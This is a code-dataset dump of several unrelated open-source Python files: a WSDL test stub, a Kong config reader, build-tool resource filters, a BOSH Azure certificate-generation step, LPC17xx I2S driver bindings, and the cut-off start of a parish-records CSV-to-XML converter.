text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from unittest2 import TestCase
# from aux.protocol.rest.jsondl import JSONDL
from aux.protocol.soap.wsdl import WSDLClient
from wsdldatatmp import ssp_wsdl
WSDL_MOCK = '''<wsdl:definitions name="TestService"
targetNamespace="http://www.examples.com/wsdl/HelloService.wsdl"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:tns="http://www.examples.com/wsdl/HelloService.wsdl"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<wsdl:types>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
</xs:schema>
</wsdl:types>
<wsdl:message name="GetTestRequest">
<wsdl:part element="tns:GetTest" name="GetTestRequest"></wsdl:part>
</wsdl:message>
<wsdl:portType name="testsomething">
<wsdl:operation name="GetTest">
</wsdl:operation>
</wsdl:portType>
<wsdl:service name="TestService">
</wsdl:service>
</wsdl:definitions>
'''
JSONDL_MOCK = '''
{"api": {},
"types": {}
}
'''
class TestWSDLObject(TestCase):
def xtest_get_test_request(self):
wsdl = WSDLClient(wsdl_data=ssp_wsdl)
|
{
"content_hash": "19fae21a498ebea2bbc0724d2e9a56ee",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 72,
"avg_line_length": 26.571428571428573,
"alnum_prop": 0.6810035842293907,
"repo_name": "protojour/aux",
"id": "aba6a97e1dfc31c417fa52f8f092ed6eb0e44482",
"size": "1116",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/unit/test_wsdl_jsondl.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "768173"
},
{
"name": "Shell",
"bytes": "103"
}
],
"symlink_target": ""
}
|
import os
import configparser
def read_conf(env_name):
home = os.path.expanduser("~")
file = '.kong'
file_path = os.path.join(home, file)
try:
if os.path.exists(file_path):
pygd_parser = configparser.ConfigParser()
pygd_parser.read(file_path)
return pygd_parser[env_name]
else:
raise FileNotFoundError
except Exception as error:
raise error
|
{
"content_hash": "00d6fa7ae29e8e2f5f26227bbee5b143",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 53,
"avg_line_length": 24.22222222222222,
"alnum_prop": 0.5963302752293578,
"repo_name": "paraizofelipe/kong-wrapper",
"id": "a2c4e03c4418c6023e3a27af3b9d4251d90679ea",
"size": "436",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kong_wrapper/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "23719"
},
{
"name": "Shell",
"bytes": "449"
}
],
"symlink_target": ""
}
|
import os
import finder
import re
import sys
def makefilter(name, xtrapath=None):
typ, nm, fullname = finder.identify(name, xtrapath)
if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE):
return ModFilter([os.path.splitext(nm)[0]])
if typ == finder.PACKAGE:
return PkgFilter([fullname])
if typ == finder.DIRECTORY:
return DirFilter([fullname])
if typ in (finder.BINARY, finder.PBINARY):
return FileFilter([nm])
return FileFilter([fullname])
class _Filter:
def __repr__(self):
return '<'+self.__class__.__name__+' '+repr(self.elements)+'>'
class _NameFilter(_Filter):
""" A filter mixin that matches (exactly) on name """
def matches(self, res):
return self.elements.get(res.name, 0)
class _PathFilter(_Filter):
""" A filter mixin that matches if the resource is below any of the paths"""
def matches(self, res):
p = os.path.normcase(os.path.abspath(res.path))
while len(p) > 3:
p = os.path.dirname(p)
if self.elements.get(p, 0):
return 1
return 0
class _ExtFilter(_Filter):
""" A filter mixin that matches based on file extensions (either way) """
include = 0
def matches(self, res):
fnd = self.elements.get(os.path.splitext(res.path)[1], 0)
if self.include:
return not fnd
return fnd
class _TypeFilter(_Filter):
""" A filter mixin that matches on resource type (either way) """
include = 0
def matches(self, res):
fnd = self.elements.get(res.typ, 0)
if self.include:
return not fnd
return fnd
class _PatternFilter(_Filter):
""" A filter that matches if re.search succeeds on the resource path """
def matches(self, res):
for regex in self.elements:
if regex.search(res.path):
return 1
return 0
class ExtFilter(_ExtFilter):
""" A file extension filter.
ExtFilter(extlist, include=0)
where extlist is a list of file extensions """
def __init__(self, extlist, include=0):
self.elements = {}
for ext in extlist:
if ext[0:1] != '.':
ext = '.'+ext
self.elements[ext] = 1
self.include = include
class TypeFilter(_TypeFilter):
""" A filter for resource types.
TypeFilter(typlist, include=0)
where typlist is a subset of ['a','b','d','m','p','s','x','z'] """
def __init__(self, typlist, include=0):
self.elements = {}
for typ in typlist:
self.elements[typ] = 1
self.include = include
class FileFilter(_NameFilter):
""" A filter for data files """
def __init__(self, filelist):
self.elements = {}
for f in filelist:
self.elements[f] = 1
class ModFilter(_NameFilter):
""" A filter for Python modules.
ModFilter(modlist) where modlist is eg ['macpath', 'dospath'] """
def __init__(self, modlist):
self.elements = {}
for mod in modlist:
self.elements[mod] = 1
class DirFilter(_PathFilter):
""" A filter based on directories.
DirFilter(dirlist)
dirs may be relative and will be normalized.
Subdirectories of dirs will be excluded. """
def __init__(self, dirlist):
self.elements = {}
for pth in dirlist:
pth = os.path.normcase(os.path.abspath(pth))
self.elements[pth] = 1
class PkgFilter(_PathFilter):
"""At this time, identical to a DirFilter (being lazy) """
def __init__(self, pkglist):
#warning - pkgs are expected to be full directories
self.elements = {}
for pkg in pkglist:
pth = os.path.normcase(os.path.abspath(pkg))
self.elements[pth] = 1
class StdLibFilter(_PathFilter):
""" A filter that excludes anything found in the standard library """
def __init__(self):
pth = os.path.normcase(os.path.join(sys.exec_prefix, 'lib'))
self.elements = {pth:1}
class PatternFilter(_PatternFilter):
""" A filter that excludes if any pattern is found in resource's path """
def __init__(self, patterns):
self.elements = []
for pat in patterns:
self.elements.append(re.compile(pat))
|
{
"content_hash": "defc0f8cfe03dbe4c27a022830a1a485",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 80,
"avg_line_length": 33.48091603053435,
"alnum_prop": 0.5809393524851801,
"repo_name": "toontownfunserver/Panda3D-1.9.0",
"id": "aa0c0203e2e0ed4617b08fc04ca9b6c7330ac920",
"size": "4386",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "direct/pyinst/tocfilter.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1186"
},
{
"name": "C",
"bytes": "1824481"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5471478"
},
{
"name": "Emacs Lisp",
"bytes": "147093"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "MAXScript",
"bytes": "1745"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009441"
},
{
"name": "Objective-C",
"bytes": "15934"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30052"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "17733821"
},
{
"name": "Shell",
"bytes": "12056"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
}
|
from subprocess import call
from os import makedirs
from os import path
from shutil import copy
from jinja2 import Environment
from subprocess import Popen, PIPE
def do_step(context):
if not path.isdir("bosh/manifests"):
makedirs("bosh/manifests")
if not path.isdir("bosh/certs"):
makedirs("bosh/certs")
settings = context.meta['settings']
# Generate the private key and certificate
call("ssh-keygen -b 2048 -t rsa -f ./id_rsa_bosh -q -N ''", shell=True)
copy("id_rsa_bosh", "./bosh")
copy("id_rsa_bosh.pub", "./bosh")
with open('id_rsa_bosh.pub', 'r') as tmpfile:
ssh_key = tmpfile.read()
settings['SSH_PUB_KEY'] = ssh_key
settings['cf_ip'] = settings['cf-ip']
# template openssl config
env = Environment()
template_path = "certs/openssl.conf"
with open(template_path, 'r') as f:
contents = f.read()
contents = env.from_string(contents).render(settings)
with open(path.join('bosh', template_path), 'w') as f:
f.write(contents)
cf_ip = settings["cf-ip"]
call("openssl genrsa -out bosh/certs/server.key 2048", shell=True)
call("openssl req -new -out bosh/certs/sub1.csr -key bosh/certs/server.key -config bosh/certs/openssl.conf -subj \"/C=US/ST=CA/L=San Francisco/O=Pivotal Labs/OU=Platform Engineering/CN={0}.cf.pcfazure.com\"".format(cf_ip), shell=True)
call("openssl req -text -noout -in bosh/certs/sub1.csr", shell=True)
call("openssl x509 -req -days 3650 -in bosh/certs/sub1.csr -signkey bosh/certs/server.key -out bosh/certs/sub1.crt -extensions v3_req -extfile bosh/certs/openssl.conf", shell=True)
call("openssl x509 -in bosh/certs/sub1.crt -text -noout", shell=True)
p = Popen(['cat', 'bosh/certs/sub1.crt', 'bosh/certs/sub1.csr', 'bosh/certs/server.key'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
settings['ha_proxy_cert'] = output
return context
|
{
"content_hash": "5564f448ccfcbdc280093887010fdaed",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 238,
"avg_line_length": 36.074074074074076,
"alnum_prop": 0.6663244353182751,
"repo_name": "cf-platform-eng/bosh-azure-template",
"id": "9641ffa907e88915c6673a238c4e9a1eab722ca5",
"size": "1948",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "install_steps/create_certs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "43747"
},
{
"name": "Shell",
"bytes": "6319"
}
],
"symlink_target": ""
}
|
"""I2S client library functions. Find implementation details in LPC17xx
CMSIS-Compliant Standard Peripheral Firmware Driver Library documentation.
"""
from internals import robocaller, cstruct
__author__ = "Neil MacMunn"
__credits__ = ["Neil MacMunn", "NXP MCU SW Application Team"]
__maintainer__ = "Neil MacMunn"
__email__ = "neil@gumstix.com"
__copyright__ = "Copyright 2011, Gumstix Inc"
__license__ = "BSD 2-Clause"
__version__ = "0.1"
# I2S configuration parameter defines
# I2S Wordwidth bit
I2S_WORDWIDTH_8 = ((0))
I2S_WORDWIDTH_16 = ((1))
I2S_WORDWIDTH_32 = ((3))
# I2S Channel bit
I2S_STEREO = ((0))
I2S_MONO = ((1))
# I2S Master/Slave mode bit
I2S_MASTER_MODE = ((0))
I2S_SLAVE_MODE = ((1))
# I2S Stop bit
I2S_STOP_ENABLE = ((1))
I2S_STOP_DISABLE = ((0))
# I2S Reset bit
I2S_RESET_ENABLE = ((1))
I2S_RESET_DISABLE = ((0))
# I2S Mute bit
I2S_MUTE_ENABLE = ((1))
I2S_MUTE_DISABLE = ((0))
# I2S Transmit/Receive bit
I2S_TX_MODE = ((0))
I2S_RX_MODE = ((1))
# I2S Clock Select bit
I2S_CLKSEL_FRDCLK = ((0))
I2S_CLKSEL_MCLK = ((2))
# I2S 4-pin Mode bit
I2S_4PIN_ENABLE = ((1))
I2S_4PIN_DISABLE = ((0))
# I2S MCLK Enable bit
I2S_MCLK_ENABLE = ((1))
I2S_MCLK_DISABLE = ((0))
# I2S select DMA bit
I2S_DMA_1 = ((0))
I2S_DMA_2 = ((1))
# Macro defines for DAO-Digital Audio Output register
# I2S wordwide - the number of bytes in data
# 8 bit
I2S_DAO_WORDWIDTH_8 = ((0))
# 16 bit
I2S_DAO_WORDWIDTH_16 = ((1))
# 32 bit
I2S_DAO_WORDWIDTH_32 = ((3))
# I2S control mono or stereo format
I2S_DAO_MONO = ((1<<2))
# I2S control stop mode
I2S_DAO_STOP = ((1<<3))
# I2S control reset mode
I2S_DAO_RESET = ((1<<4))
# I2S control master/slave mode
I2S_DAO_SLAVE = ((1<<5))
def I2S_DAO_WS_HALFPERIOD(n):
'''I2S word select half period minus one.
'''
return ((n<<6))
# I2S control mute mode
I2S_DAO_MUTE = ((1<<15))
# Macro defines for DAI-Digital Audio Input register
# I2S wordwide - the number of bytes in data
# 8 bit
I2S_DAI_WORDWIDTH_8 = ((0))
# 16 bit
I2S_DAI_WORDWIDTH_16 = ((1))
# 32 bit
I2S_DAI_WORDWIDTH_32 = ((3))
# I2S control mono or stereo format
I2S_DAI_MONO = ((1<<2))
# I2S control stop mode
I2S_DAI_STOP = ((1<<3))
# I2S control reset mode
I2S_DAI_RESET = ((1<<4))
# I2S control master/slave mode
I2S_DAI_SLAVE = ((1<<5))
def I2S_DAI_WS_HALFPERIOD(n):
'''I2S word select half period minus one (9 bits).
'''
return (((n&0x1FF)<<6))
# I2S control mute mode
I2S_DAI_MUTE = ((1<<15))
# Macro defines for STAT register (Status Feedback register)
# I2S Status Receive or Transmit Interrupt
I2S_STATE_IRQ = ((1))
# I2S Status Receive or Transmit DMA1
I2S_STATE_DMA1 = ((1<<1))
# I2S Status Receive or Transmit DMA2
I2S_STATE_DMA2 = ((1<<2))
def I2S_STATE_RX_LEVEL(n):
'''I2S Status Current level of the Receive FIFO (5 bits).
'''
return (((n&0x1F)<<8))
def I2S_STATE_TX_LEVEL(n):
'''I2S Status Current level of the Transmit FIFO (5 bits).
'''
return (((n&0x1F)<<16))
# Macro defines for DMA1 register (DMA1 Configuration register)
# I2S control DMA1 for I2S receive
I2S_DMA1_RX_ENABLE = ((1))
# I2S control DMA1 for I2S transmit
I2S_DMA1_TX_ENABLE = ((1<<1))
def I2S_DMA1_RX_DEPTH(n):
'''I2S set FIFO level that trigger a receive DMA request on DMA1.
'''
return (((n&0x1F)<<8))
def I2S_DMA1_TX_DEPTH(n):
'''I2S set FIFO level that trigger a transmit DMA request on DMA1.
'''
return (((n&0x1F)<<16))
# I2S control DMA2 for I2S receive
I2S_DMA2_RX_ENABLE = ((1))
# I2S control DMA2 for I2S transmit
I2S_DMA2_TX_ENABLE = ((1<<1))
# Macro defines for DMA2 register (DMA2 Configuration register)
def I2S_DMA2_RX_DEPTH(n):
'''I2S set FIFO level that trigger a receive DMA request on DMA2.
'''
return (((n&0x1F)<<8))
def I2S_DMA2_TX_DEPTH(n):
'''I2S set FIFO level that trigger a transmit DMA request on DMA2.
'''
return (((n&0x1F)<<16))
# Macro defines for IRQ register (Interrupt Request Control register)
# I2S control I2S receive interrupt
I2S_IRQ_RX_ENABLE = ((1))
# I2S control I2S transmit interrupt
I2S_IRQ_TX_ENABLE = ((1<<1))
def I2S_IRQ_RX_DEPTH(n):
'''I2S set the FIFO level on which to create an irq request.
'''
return (((n&0x1F)<<8))
def I2S_IRQ_TX_DEPTH(n):
'''I2S set the FIFO level on which to create an irq request.
'''
return (((n&0x1F)<<16))
# Macro defines for TXRATE/RXRATE register (Transmit/Receive Clock Rate register)
def I2S_TXRATE_Y_DIVIDER(n):
'''I2S Transmit MCLK rate denominator.
'''
return ((n&0xFF))
def I2S_TXRATE_X_DIVIDER(n):
'''I2S Transmit MCLK rate denominator.
'''
return (((n&0xFF)<<8))
def I2S_RXRATE_Y_DIVIDER(n):
'''I2S Receive MCLK rate denominator.
'''
return ((n&0xFF))
def I2S_RXRATE_X_DIVIDER(n):
'''I2S Receive MCLK rate denominator.
'''
return (((n&0xFF)<<8))
# Macro defines for TXBITRATE & RXBITRATE register
def I2S_TXBITRATE(n):
'''Transmit Bit Rate registe.
'''
return ((n&0x3F))
def I2S_RXBITRATE(n):
'''Receive Bit Rate register.
'''
return ((n&0x3F))
# Macro defines for TXMODE/RXMODE register (Transmit/Receive Mode Control register)
def I2S_TXMODE_CLKSEL(n):
'''I2S Transmit select clock source (2 bits).
'''
return ((n&0x03))
# I2S Transmit control 4-pin mode
I2S_TXMODE_4PIN_ENABLE = ((1<<2))
# I2S Transmit control the TX_MCLK output
I2S_TXMODE_MCENA = ((1<<3))
def I2S_RXMODE_CLKSEL(n):
'''I2S Receive select clock source.
'''
return ((n&0x03))
# I2S Receive control 4-pin mode
I2S_RXMODE_4PIN_ENABLE = ((1<<2))
# I2S Receive control the TX_MCLK output
I2S_RXMODE_MCENA = ((1<<3))
def PARAM_I2Sx(n):
'''Macro to determine if it is valid I2S peripheral.
'''
return ((n)==(LPC_I2S))
def PRAM_I2S_FREQ(freq):
'''Macro to check Data to send valid.
'''
return ((freq>=16000)and(freq <= 96000))
def PARAM_I2S_WORDWIDTH(n):
'''Macro check I2S word width type.
'''
return ((n==I2S_WORDWIDTH_8) or (n==I2S_WORDWIDTH_16) or (n==I2S_WORDWIDTH_32))
def PARAM_I2S_CHANNEL(n):
'''Macro check I2S channel type.
'''
return ((n==I2S_STEREO) or (n==I2S_MONO))
def PARAM_I2S_WS_SEL(n):
'''Macro check I2S master/slave mode.
'''
return ((n==I2S_MASTER_MODE)or(n==I2S_SLAVE_MODE))
def PARAM_I2S_STOP(n):
'''Macro check I2S stop mode.
'''
return ((n==I2S_STOP_ENABLE)or(n==I2S_STOP_DISABLE))
def PARAM_I2S_RESET(n):
'''Macro check I2S reset mode.
'''
return ((n==I2S_RESET_ENABLE)or(n==I2S_RESET_DISABLE))
def PARAM_I2S_MUTE(n):
'''Macro check I2S reset mode.
'''
return ((n==I2S_MUTE_ENABLE)or(n==I2S_MUTE_DISABLE))
def PARAM_I2S_TRX(n):
'''Macro check I2S transmit/receive mode.
'''
return ((n==I2S_TX_MODE)or(n==I2S_RX_MODE))
def PARAM_I2S_CLKSEL(n):
'''Macro check I2S clock select mode.
'''
return ((n==I2S_CLKSEL_FRDCLK)or(n==I2S_CLKSEL_MCLK))
def PARAM_I2S_4PIN(n):
'''Macro check I2S 4-pin mode.
'''
return ((n==I2S_4PIN_ENABLE)or(n==I2S_4PIN_DISABLE))
def PARAM_I2S_MCLK(n):
'''Macro check I2S MCLK mode.
'''
return ((n==I2S_MCLK_ENABLE)or(n==I2S_MCLK_DISABLE))
def PARAM_I2S_DMA(n):
'''Macro check I2S DMA mode.
'''
return ((n==I2S_DMA_1)or(n==I2S_DMA_2))
def PARAM_I2S_DMA_DEPTH(n):
'''Macro check I2S DMA depth value.
'''
return ((n>=0)or(n<=31))
def PARAM_I2S_IRQ_LEVEL(n):
'''Macro check I2S irq level value.
'''
return ((n>=0)or(n<=31))
def PARAM_I2S_HALFPERIOD(n):
'''Macro check I2S half-period value.
'''
return ((n>0)and(n<512))
def PARAM_I2S_BITRATE(n):
'''Macro check I2S bit-rate value.
'''
return ((n>=0)and(n<=63))
class I2S_CFG_Type(cstruct):
'''I2S configuration structure definition.
wordwidth: the number of bytes in data as follow:
I2S_WORDWIDTH_8: 8 bit data
I2S_WORDWIDTH_16: 16 bit data
I2S_WORDWIDTH_32: 32 bit data
mono: Set mono/stereo mode, should be:
I2S_STEREO: stereo mode
I2S_MONO: mono mode
stop: Disables accesses on FIFOs, should be:
I2S_STOP_ENABLE: enable stop mode
I2S_STOP_DISABLE: disable stop mode
reset: Asynchronously reset tje transmit channel and FIFO, should be:
I2S_RESET_ENABLE: enable reset mode
I2S_RESET_DISABLE: disable reset mode
ws_sel: Set Master/Slave mode, should be:
I2S_MASTER_MODE: I2S master mode
I2S_SLAVE_MODE: I2S slave mode
mute: MUTE mode: when true, the transmit channel sends only zeroes, shoule be:
I2S_MUTE_ENABLE: enable mute mode
I2S_MUTE_DISABLE: disable mute mode
ptr: LPC1769 memory address where structure is stored. Use this in place of
the C reference operator (&).
'''
pass
class I2S_DMAConf_Type(cstruct):
'''I2S DMA configuration structure definition.
DMAIndex: Select DMA1 or DMA2, should be:
I2S_DMA_1: DMA1
I2S_DMA_2: DMA2
depth: FIFO level that triggers a DMA request
ptr: LPC1769 memory address where structure is stored. Use this in place of
the C reference operator (&).
'''
pass
class I2S_MODEConf_Type(cstruct):
'''I2S mode configuration structure definition.
clksel: Clock source selection, should be:
I2S_CLKSEL_FRDCLK: Select the fractional rate divider clock output
I2S_CLKSEL_MCLK: Select the MCLK signal as the clock source
fpin: Select four pin mode, should be:
I2S_4PIN_ENABLE: 4-pin enable
I2S_4PIN_DISABLE: 4-pin disable
mcena: Select MCLK mode, should be:
I2S_MCLK_ENABLE: MCLK enable for output
I2S_MCLK_DISABLE: MCLK disable for output
ptr: LPC1769 memory address where structure is stored. Use this in place of
the C reference operator (&).
'''
pass
def I2S_GetLevel(I2Sx, TRMode):
'''Get I2S Buffer Level.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
return: current level of Transmit/Receive Buffer
'''
return robocaller("I2S_GetLevel", "uint8_t", I2Sx, TRMode)
def I2S_GetIRQDepth(I2Sx, TRMode):
'''Get I2S interrupt depth.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
return: depth of FIFO level on which to create an irq request
'''
return robocaller("I2S_GetIRQDepth", "uint8_t", I2Sx, TRMode)
def I2S_Mute(I2Sx, TRMode):
'''I2S Mute.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
'''
return robocaller("I2S_Mute", "void", I2Sx, TRMode)
def I2S_Start(I2Sx):
'''Clear all STOP,RESET and MUTE bit, ready to operate.
I2Sx: I2S peripheral selected, should be: LPC_I2S
'''
return robocaller("I2S_Start", "void", I2Sx)
def I2S_Pause(I2Sx, TRMode):
'''I2S Pause.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
'''
return robocaller("I2S_Pause", "void", I2Sx, TRMode)
def I2S_Init(I2Sx):
'''Initialize I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
'''
return robocaller("I2S_Init", "void", I2Sx)
def I2S_SetBitRate(I2Sx, bitrate, TRMode):
'''I2S set bitrate.
I2Sx: I2S peripheral selected, should be: LPC_I2S
bitrate: bitrate value should be in range: 0 .. 63
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
'''
return robocaller("I2S_SetBitRate", "void", I2Sx, bitrate, TRMode)
def I2S_FreqConfig(I2Sx, Freq, TRMode):
'''Set frequency for I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
Freq: The frequency to be set. It can range from 16-96 kHz(16, 22.05, 32,
44.1, 48, 96kHz)
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
return: Status: ERROR or SUCCESS
'''
return robocaller("I2S_FreqConfig", "Status", I2Sx, Freq, TRMode)
def I2S_DMACmd(I2Sx, DMAIndex, TRMode, NewState):
'''Enable/Disable DMA operation for I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
DMAIndex: DMAIndex chose what DMA is used, should be:
I2S_DMA_1 = 0: DMA1
I2S_DMA_2 = 1: DMA2
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
NewState: new state of DMA operation, should be:
ENABLE
DISABLE
'''
return robocaller("I2S_DMACmd", "void", I2Sx, DMAIndex, TRMode, NewState)
def I2S_Send(I2Sx, BufferData):
'''I2S Send data.
I2Sx: I2S peripheral selected, should be: LPC_I2S
BufferData: pointer to uint32_t is the data will be send
'''
return robocaller("I2S_Send", "void", I2Sx, BufferData)
def I2S_Receive(I2Sx):
'''I2S Receive Data.
I2Sx: I2S peripheral selected, should be: LPC_I2S
return: received value
'''
return robocaller("I2S_Receive", "uint32_t", I2Sx)
def I2S_DeInit(I2Sx):
'''Deinitialize I2S transmit or receive.
I2Sx: I2S peripheral selected, should be: LPC_I2S
'''
return robocaller("I2S_DeInit", "void", I2Sx)
def I2S_Config(I2Sx, TRMode, ConfigStruct):
'''Configure I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
ConfigStruct: pointer to I2S_CFG_Type structure which will be initialized
'''
return robocaller("I2S_Config", "void", I2Sx, TRMode, ConfigStruct)
def I2S_IRQCmd(I2Sx, TRMode, NewState):
'''Enable/Disable IRQ for I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
NewState: ENABLE or DISABLE
'''
return robocaller("I2S_IRQCmd", "void", I2Sx, TRMode, NewState)
def I2S_IRQConfig(I2Sx, TRMode, level):
'''Configure IRQ for I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
level: the FIFO level that triggers IRQ request
'''
return robocaller("I2S_IRQConfig", "void", I2Sx, TRMode, level)
def I2S_Stop(I2Sx, TRMode):
'''I2S Stop.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
'''
return robocaller("I2S_Stop", "void", I2Sx, TRMode)
def I2S_DMAConfig(I2Sx, DMAConfig, TRMode):
'''Configure DMA operation for I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
DMAConfig: pointer to I2S_DMAConf_Type used for configuration
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
'''
return robocaller("I2S_DMAConfig", "void", I2Sx, DMAConfig, TRMode)
def I2S_ModeConfig(I2Sx, ModeConfig, TRMode):
'''Configuration operating mode for I2S.
I2Sx: I2S peripheral selected, should be: LPC_I2S
ModeConfig: pointer to I2S_MODEConf_Type used for configuration
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
'''
return robocaller("I2S_ModeConfig", "void", I2Sx, ModeConfig, TRMode)
def I2S_GetIRQStatus(I2Sx, TRMode):
'''Get I2S interrupt status.
I2Sx: I2S peripheral selected, should be: LPC_I2S
TRMode: Transmit/receive mode, should be:
I2S_TX_MODE = 0: transmit mode
I2S_RX_MODE = 1: receive mode
return: FunctionalState should be: ENABLE or DISABLE
'''
return robocaller("I2S_GetIRQStatus", "FunctionalState", I2Sx, TRMode)
|
{
"content_hash": "90192cfe8945f6ec50807bd58e0ecea4",
"timestamp": "",
"source": "github",
"line_count": 577,
"max_line_length": 83,
"avg_line_length": 27.760831889081455,
"alnum_prop": 0.652078911224872,
"repo_name": "robovero/python",
"id": "7c550407506004b1d94cfb489b3969e11c346ef2",
"size": "16018",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "robovero/lpc17xx_i2s.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "348265"
}
],
"symlink_target": ""
}
|
"""
ABPRefFromBigCSV.py
convert CVS data to xml (ref format)
26,000 csv format
need a list of ABP image keys to extract the correct line (S_Passau_Hals_008_0084)
H. Déjean
copyright NLE 2017
READ project
Developed for the EU project READ. The READ project has received funding
from the European Union�s Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from optparse import OptionParser
#import sys, os.path
from lxml import etree
import csv
class CSV2REF(object):
#DEFINE the version, usage and description of this particular component
version = "v1.0"
description = "load CSV file and extract records corresponding to image key. Generate a ref "
name="CSV2REF"
usage= ""
def __init__(self):
self.inputFileName = None
self.outputFileName = None
self.sDelimiter = ',' #';'
self.keylist= None
## Add a parameter to the componenet
## Syntax is siilar to optparse.OptionParser.add_option (the Python module optparse, class OptionParser, method add_option)
#@param *args (passing by position)
#@param **kwargs (passing by name)
def add_option(self, *args, **kwargs):
"""add a new command line option to the parser"""
self.parser.add_option(*args, **kwargs)
def createCommandLineParser(self):
self.parser = OptionParser(usage=self.usage, version=self.version)
self.parser.description = self.description
self.add_option("-i", "--input", dest="input", default="-", action="store", type="string", help="input DB file", metavar="<file>")
self.add_option("-o", "--output", dest="output", default="-", action="store", type="string", help="output REF file", metavar="<file>")
self.add_option("-d", "--delimiter", dest="delimiter", default=";", action="store", type="string", help="delimiter used in csv", metavar="S")
# self.add_option("--test", dest="test", default=False, action="store_true", help="test")
def parseCommandLine(self):
(options, args) = self.parser.parse_args()
dOptions = {}
for k,v in options.__dict__.items():
if v != None: dOptions[k] = v
return dOptions, args
def setParams(self, dParams):
"""
Here, we set our internal attribute according to a possibly specified value (otherwise it stays at its default value)
"""
#if some input or output was defined, they take precedence to the config
bInput = "input" in dParams.keys()
if bInput: self.inputFileName = dParams["input"]
bOutput = "output" in dParams.keys()
if bOutput: self.outputFileName = dParams["output"]
if "delimiter" in dParams.keys(): self.sDelimiter=dParams['delimiter']
if "keylist" in dParams.keys(): self.keylist=dParams['keylist']
def loadDB(self,dbfilename,keylist):
"""
Open and read csv file
'Aicha-an-der-Donau','4','3','5','Erber','Barbara','1','','','1','Täufling','1847','','','','','','','','','','','5356405','5392401','springer_2016-07-26'
simply filter with parishes first
"""
lParishes = list(map(lambda x:x[0],keylist))
db=[]
with open(dbfilename,'r',encoding='utf-8') as dbfilename:
dbreader= csv.reader(dbfilename,delimiter=self.sDelimiter,quotechar="'")
for lFields in dbreader:
if lFields[0] in lParishes:
db.append(lFields)
return db
def convertIntoRef(self,db,keylist):
"""
'qapfarrei','qaband','teilband','qaseite','name','vorname','folge','ort','beruf','fkt','funktion','jahr','monat','tag','alter_jahre','alter_monate','alter_wochen','alter_tage','alter_stunden','kommentar','zusatz','num_zusatz','mkz','pdkz','benutzer'
'Aicha-an-der-Donau','4','3','5','Erber','Barbara','1','','','1','Täufling','1847','','','','','','','','','','','5356405','5392401','springer_2016-07-26'
"""
